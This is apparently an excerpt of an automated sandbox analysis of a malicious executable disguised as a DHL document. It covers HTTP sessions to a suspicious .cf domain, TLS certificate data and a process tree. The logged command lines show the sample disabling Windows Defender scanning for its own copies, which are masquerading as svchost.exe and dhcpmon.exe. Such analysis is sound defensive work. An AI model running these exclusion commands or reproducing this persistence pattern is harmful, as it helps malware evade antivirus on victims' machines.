Apr 7, 2021 08:41:28.243896961 CEST	892	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 07 Apr 2021 06:41:28 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 07 Apr 2021 07:41:28 GMT Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html cf-request-id: 094ca996910000047a45935000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mEPsjD83LdCZ6ziI2fAPI5g0UJHWtyRMRhqYP%2BrxeA2H1USQxpWP%2BQEzmACA9Xrh6ewkLcqb%2Br24JhAcaQNHvaEFRq2ANgVKUzsvi%2FEI3ZiV2aE%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63c145374d6e047a-CDG alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Apr 7, 2021 08:41:29.206547022 CEST	2207	OUT	GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Apr 7, 2021 08:41:29.240850925 CEST	2208	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 07 Apr 2021 06:41:29 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 07 Apr 2021 07:41:29 GMT Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html cf-request-id: 094ca99a870000047a431e6000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=GOCSXPmjpC%2BAl%2Bx5dWXIbWjMPKH%2BrhB62%2F06dyyT9qHcfCtsumZe8PRygUQ4M%2Fj64nWLPXOVUPtK2K%2FsyD01nuYxH855eJgM1A%2FqyYcjK%2FrkQPc%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63c1453dabe5047a-CDG alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49724	172.67.150.212	80	C:\Users\user\Desktop\DHL_document11022020680908911.exe

Timestamp	kBytes transferred	Direction	Data
Apr 7, 2021 08:42:07.583554983 CEST	4035	OUT	GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf Connection: Keep-Alive
Apr 7, 2021 08:42:07.627691031 CEST	4036	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 07 Apr 2021 06:42:07 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 07 Apr 2021 07:42:07 GMT Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html cf-request-id: 094caa3071000033120a1e6000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FR5AKkRwKMth5Ab6Pl4ItCSGJLGlZ2xY1GQlDVNW647bPohVvUE%2FFb2WEycmJX5lISwZVur%2BCQRghlEjUGjMTViWP9IAWy%2BXGwC6qxT9Yi1pWok%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63c1462d8d483312-CDG alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Apr 7, 2021 08:42:08.929379940 CEST	5338	OUT	GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Apr 7, 2021 08:42:08.963265896 CEST	5339	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 07 Apr 2021 06:42:08 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 07 Apr 2021 07:42:08 GMT Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html cf-request-id: 094caa35b30000331220161000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ycoLlXYXWKW6VTB4%2B9zYUO2ZTvyyOmyYIjmMkmUK2ng%2Bx5669vkGHVIsQx1TszZNgTb6kYMoKgKbqsh9H%2FZ3NZlUaMoVWeW3ib1FU5paW9DIqeI%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63c14635ea1b3312-CDG alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49727	172.67.150.212	80	C:\Users\user\Desktop\DHL_document11022020680908911.exe

Timestamp	kBytes transferred	Direction	Data
Apr 7, 2021 08:42:14.845541954 CEST	6563	OUT	GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf Connection: Keep-Alive
Apr 7, 2021 08:42:14.891246080 CEST	6564	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 07 Apr 2021 06:42:14 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 07 Apr 2021 07:42:14 GMT Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html cf-request-id: 094caa4ccf0000edc701193000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4tJ3p7zUuECRCK1KiscHyahMkjxCUxkIJktblSi9F1tY2AK7UWsn9GCyO8wycFMRdFI8U0lM896mb4yg9ZiZ7jz3i9b9Fr%2Bmi6Cg6MIkZnxuYYs%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63c1465aec0cedc7-CDG alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Apr 7, 2021 08:42:16.168086052 CEST	7865	OUT	GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Apr 7, 2021 08:42:16.208318949 CEST	7866	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 07 Apr 2021 06:42:16 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 07 Apr 2021 07:42:16 GMT Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html cf-request-id: 094caa51f90000edc7fb8e0000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NR%2BUayqQCg1dteEMK%2FC6f7eIFq5bsvdw8vDHH9sEi50D%2FthBmyOdogyJVzoTn0DLnvQkCMSrA6vov7oNJHuxzFgCxs3d%2FxaEZ%2FtAUNVY%2FqZeSV8%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63c146632cb9edc7-CDG alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49731	172.67.150.212	80	C:\Users\user\Desktop\DHL_document11022020680908911.exe

Timestamp	kBytes transferred	Direction	Data
Apr 7, 2021 08:42:26.129017115 CEST	9071	OUT	GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf Connection: Keep-Alive
Apr 7, 2021 08:42:26.208666086 CEST	9072	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 07 Apr 2021 06:42:26 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 07 Apr 2021 07:42:26 GMT Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html cf-request-id: 094caa78e100000482c69f5000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0Q9caeFvf70NCLkSYje9ny7so6mWzwAI9rXfgF3odWzyxtQnMygpj6zw1tyFm0TZrFv86udzF%2BbyXqA7L7T%2B8GiA5PZPy5bDRvNnf8omYJhXJuU%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63c146a16d700482-CDG alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Apr 7, 2021 08:42:27.619345903 CEST	10373	OUT	GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Apr 7, 2021 08:42:27.651901960 CEST	10374	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 07 Apr 2021 06:42:27 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 07 Apr 2021 07:42:27 GMT Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html cf-request-id: 094caa7eb4000004825b10e000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Sew8%2Bt1PnkUs4TTSs7GpUUCPZhvaTAyr3o4zjx2UU%2Bc1lSB%2F3PRIBL%2BFATrLoBuMWgruzdsLehVPKME%2BMiKG0pVop4vfnL%2Bm9oALHIwoN1tWudM%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63c146aab8c10482-CDG alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 7, 2021 08:41:28.343935966 CEST	172.67.150.212	443	192.168.2.7	49703	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Mar 31 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Thu Mar 31 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
Apr 7, 2021 08:41:28.343935966 CEST	172.67.150.212	443	192.168.2.7	49703	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		54328bd36c14bd82ddaa0c04b25ed9ad
Apr 7, 2021 08:42:07.885268927 CEST	172.67.150.212	443	192.168.2.7	49725	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Mar 31 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Thu Mar 31 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
Apr 7, 2021 08:42:07.885268927 CEST	172.67.150.212	443	192.168.2.7	49725	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		54328bd36c14bd82ddaa0c04b25ed9ad
Apr 7, 2021 08:42:15.132405996 CEST	172.67.150.212	443	192.168.2.7	49728	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Mar 31 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Thu Mar 31 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
Apr 7, 2021 08:42:15.132405996 CEST	172.67.150.212	443	192.168.2.7	49728	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		54328bd36c14bd82ddaa0c04b25ed9ad

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: DHL_document11022020680908911.exe PID: 4640 Parent PID: 5896

General

Start time:	08:41:25
Start date:	07/04/2021
Path:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\DHL_document11022020680908911.exe'
Imagebase:	0xc60000
File size:	83728 bytes
MD5 hash:	DC8E7CDE980F05501758F8CE3048682E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Analysis Process: svchost.exe PID: 5688 Parent PID: 560

General

Start time:	08:41:30
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 6240 Parent PID: 4640

General

Start time:	08:41:40
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Imagebase:	0x870000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: svchost.exe PID: 6264 Parent PID: 560

General

Start time:	08:41:39
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6408 Parent PID: 6240

General

Start time:	08:41:42
Start date:	07/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 6416 Parent PID: 4640

General

Start time:	08:41:42
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document11022020680908911.exe' -Force
Imagebase:	0x870000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exe PID: 6436 Parent PID: 6416

General

Start time:	08:41:43
Start date:	07/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 6452 Parent PID: 4640

General

Start time:	08:41:44
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Imagebase:	0x870000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exe PID: 6616 Parent PID: 6452

General

Start time:	08:41:44
Start date:	07/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6944 Parent PID: 560

General

Start time:	08:41:49
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 7016 Parent PID: 560

General

Start time:	08:41:51
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 7024 Parent PID: 560

General

Start time:	08:41:51
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: DHL_document11022020680908911.exe PID: 7136 Parent PID: 4640

General

Start time:	08:41:52
Start date:	07/04/2021
Path:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
Imagebase:	0x1d0000
File size:	83728 bytes
MD5 hash:	DC8E7CDE980F05501758F8CE3048682E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 7160 Parent PID: 560

General

Start time:	08:41:52
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: DHL_document11022020680908911.exe PID: 4612 Parent PID: 4640

General

Start time:	08:41:53
Start date:	07/04/2021
Path:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
Imagebase:	0xfa0000
File size:	83728 bytes
MD5 hash:	DC8E7CDE980F05501758F8CE3048682E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: svchost.exe PID: 5728 Parent PID: 560

General

Start time:	08:41:53
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 5436 Parent PID: 560

General

Start time:	08:41:55
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 4140 Parent PID: 3292

General

Start time:	08:41:58
Start date:	07/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe'
Imagebase:	0x210000
File size:	83728 bytes
MD5 hash:	DC8E7CDE980F05501758F8CE3048682E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 15%, ReversingLabs

Analysis Process: svchost.exe PID: 6812 Parent PID: 560

General

Start time:	08:42:03
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: dhcpmon.exe PID: 1288 Parent PID: 3292

General

Start time:	08:42:07
Start date:	07/04/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0x7ff641cd0000
File size:	83728 bytes
MD5 hash:	DC8E7CDE980F05501758F8CE3048682E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 15%, ReversingLabs

Analysis Process: svchost.exe PID: 6984 Parent PID: 3292

General

Start time:	08:42:15
Start date:	07/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe'
Imagebase:	0xfc0000
File size:	83728 bytes
MD5 hash:	DC8E7CDE980F05501758F8CE3048682E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: svchost.exe PID: 5608 Parent PID: 560

General

Start time:	08:42:32
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: MpCmdRun.exe PID: 4804 Parent PID: 5436

General

Start time:	08:42:56
Start date:	07/04/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff75f730000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4792 Parent PID: 4804

General

Start time:	08:42:57
Start date:	07/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 6424 Parent PID: 4140

General

Start time:	08:43:01
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Imagebase:	0x870000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exe PID: 4960 Parent PID: 6424

General

Start time:	08:43:01
Start date:	07/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 4756 Parent PID: 4140

General

Start time:	08:43:01
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Imagebase:	0x870000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exe PID: 5840 Parent PID: 4756

General

Start time:	08:43:02
Start date:	07/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 6636 Parent PID: 4140

General

Start time:	08:43:02
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
